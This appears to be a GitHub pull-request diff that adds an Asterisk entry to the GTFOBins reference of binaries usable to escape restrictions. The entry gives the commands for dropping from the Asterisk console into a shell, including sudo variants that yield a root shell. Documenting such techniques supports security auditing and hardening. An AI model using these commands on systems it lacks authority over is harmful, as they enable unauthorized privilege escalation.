Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
18 changes: 18 additions & 0 deletions _gtfobins/asterisk.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,18 @@
---
functions:
shell:
- description: Connect to the Asterisk console and drop into a shell
code: |
asterisk -r
code: |
!sh
sudo:
- description: Start Asterisk as root in the foreground to create its CLI socket
code: |
sudo asterisk -F
- description: Connect to the Asterisk console as root and drop into a shell
code: |
sudo asterisk -r
code: |
!sh
---